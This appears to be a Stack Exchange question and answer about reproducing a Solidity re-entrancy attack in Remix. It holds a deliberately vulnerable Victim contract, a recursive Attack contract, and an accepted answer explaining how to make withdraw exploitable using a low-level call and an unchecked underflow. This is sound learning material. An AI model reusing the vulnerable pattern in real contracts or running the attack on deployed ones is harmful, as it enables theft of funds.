# Recreating a re-entrancy attack but transaction failed/reverted, why?

Tags: remix, solidity-0.8.x

I tried creating 2 contracts (Victim.sol and Attack.sol) in Remix, to recreate a re-entrancy attack, in particular the recursive function calling.

Victim.sol is the contract to be siphoned, I deposited funds into it first after deployment. Then Attack.sol is the attacking contract with a fallback function that is supposed to call withdraw on Victim recursively.

But when I call the attack function in Attack.sol, it doesn't result in calling withdraw recursively.

Here's the code for Victim.sol:

```
/// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

contract Victim {
    mapping(address => uint256) public balances;

    function deposit() public payable {
        balances[msg.sender] += msg.value;
    }
  
    function withdrawAll() public {
        uint256 amount = balances[msg.sender];         
        payable(msg.sender).transfer(amount);
        balances[msg.sender] = 0;
    }

    function withdraw(uint256 amount) public {
        require(amount <= balances[msg.sender], "Trying to withdraw too much!");
        payable(msg.sender).transfer(amount);
        balances[msg.sender] -= amount;
    }

    function contractBalance() public view returns(uint256) {
        return address(this).balance;
    }

}
```

For Attack.sol:

```
/// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

import "./Victim.sol";

contract Attack {
    
    Victim public victim;

    constructor(address _victim){
        victim = Victim(_victim);
    }

    fallback() external payable {
        if (address(victim).balance >= 1000000000000000000) {
            victim.withdraw(1000000000000000000);
        }
    }

    receive() external payable {

    }

    function attack() external payable {
        victim.deposit{value: 1000000000000000000}();
        victim.withdraw(1000000000000000000);
    }

    function contractBalance() public view returns(uint256) {
        return address(this).balance;
    }

}
```

Answer (score 1, accepted):

The are 2 reasons this is failing.

##### Transfer() gas limit

`address.transfer()` has a gas limit of  2100. Its enough for emitting an event but not enough for `victim.withdraw()` in the fallback function. You can change it to

```js
(bool success,) = payable(msg.sender).call{value:amount}("");
```

##### Overflow check in v0.8.0

Solidity v0.8.0 has introduced an [implicit overflow/underflow check](https://docs.soliditylang.org/en/v0.8.0/080-breaking-changes.html). Because of this,

```js
balances[msg.sender] -= amount;
```

will fail as when the reccursion stops, balances will be set reduced multiple times that there will be an underflow (negative balance). You can ask the compiler to deliberately skip the check.

```js
unchecked{
    balances[msg.sender] -= amount;
}
```

With these two changes, you will be able to recreate reentrancy. The `withdraw` function will finally look like this

```js
function withdraw(uint256 amount) public {
    require(amount <= balances[msg.sender], "Trying to withdraw too much!");
    (bool a,)=payable(msg.sender).call{value:amount}("");
    unchecked{
        balances[msg.sender] -= amount;
    }
}
```

Comment: Thank you @pbsh for explaining it so clearly to me! :)

I tried it and initially it didn't work in my code. I had to change the withdraw in the fallback function to the receive function in Attack.sol.



From your answer, it seems that if I used transfer in Victim.sol , it will prevent a re-entrancy attack? 

Is there another way to continue using transfer in Victim.sol , but for a successful attack?